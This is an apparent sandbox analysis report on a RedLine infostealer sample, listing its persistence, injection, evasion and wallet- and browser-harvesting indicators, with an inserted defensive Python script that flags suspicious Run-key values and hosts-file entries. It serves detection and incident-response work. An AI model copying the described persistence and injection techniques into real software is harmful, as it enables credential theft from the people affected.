Malware Analysis Report

2025-01-18 07:59

Sample ID 230812-nmangadd8z
Target 344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc
SHA256 344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc

Threat Level: Known bad

The file 344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Executes dropped EXE

Themida packer

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-12 11:30

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-12 11:30

Reported

2023-08-12 11:32

Platform

win10-20230703-en

Max time kernel

150s

Max time network

147s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2393848421-2120571652-2495149697-1000\Software\Microsoft\Windows\CurrentVersion\Run\AppLaunch = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
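The Run value above, together with the hosts-file writes recorded under "Drops file in Drivers directory", is what a responder would sweep other hosts for. The following Python is an added example, not part of the sandbox output: the Run-key dump and hosts content are constructed to mirror the report (only the AppLaunch.exe value and its path are taken from it), the list of argument-less .NET host binaries beyond AppLaunch.exe is my assumption, and the live-registry reader only does anything on Windows.

```python
"""Offline triage of the persistence artifacts in this report: a Run value
that starts AppLaunch.exe with no arguments, and active hosts-file entries.
Added example; the sample data below is constructed, not sandbox output."""
from pathlib import PureWindowsPath

# Constructed dump of HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# (value name -> command). The "AppLaunch" entry is the one in the report.
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "AppLaunch": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"',
}

# Constructed hosts file: the stock Windows file (comments only) plus one
# appended line. The domain is a placeholder; the report does not record
# what the sample actually wrote.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
#
# localhost name resolution is handled within DNS itself.
#\t127.0.0.1       localhost
#\t::1             localhost
0.0.0.0 update-server.invalid  # appended entry
"""

# .NET Framework utilities that exit at once when started without
# arguments; a Run value that launches one bare is an injection host, not
# an application. AppLaunch.exe is from the report; the rest are my
# assumption of the usual candidates.
BARE_DOTNET_HOSTS = {"applaunch.exe", "regasm.exe", "regsvcs.exe", "installutil.exe"}


def split_command(cmd):
    """Split a Run value into (executable, arguments), honouring quotes."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        if end > 0:
            return cmd[1:end], cmd[end + 1:].strip()
    exe, _, args = cmd.partition(" ")
    return exe, args.strip()


def flag_run_values(values):
    """Return [(value_name, reason)] for Run entries matching the report."""
    flagged = []
    for name, cmd in values.items():
        exe, args = split_command(cmd)
        base = PureWindowsPath(exe).name.lower()
        if base in BARE_DOTNET_HOSTS and not args:
            flagged.append((name, f"{base} started with no arguments"))
    return flagged


def active_hosts_entries(text):
    """Return (ip, [names]) for every uncommented hosts line. The stock
    Windows hosts file has none, so any result is a local override."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            ip, *names = line.split()
            entries.append((ip, names))
    return entries


def read_run_values():
    """Read the live HKCU Run key on Windows; returns {} elsewhere."""
    try:
        import winreg
    except ImportError:
        return {}
    out = {}
    path = r"Software\Microsoft\Windows\CurrentVersion\Run"
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:
                return out
            out[name] = str(data)
            index += 1


if __name__ == "__main__":
    for name, why in flag_run_values(read_run_values() or SAMPLE_RUN_VALUES):
        print(f"Run\\{name}: {why}")
    for ip, names in active_hosts_entries(SAMPLE_HOSTS):
        print(f"hosts: {ip} -> {' '.join(names)}")
```

On a live Windows host the script reads the current user's Run key and falls back to the constructed sample elsewhere; the hosts check is deliberately a parser over text so it can be pointed at a file pulled from a disk image as easily as at the live C:\Windows\System32\drivers\etc\hosts.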

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3164 set thread context of 220 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4424 set thread context of 5016 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 4424 set thread context of 2076 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 (SeTimeZonePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 (SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege) N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
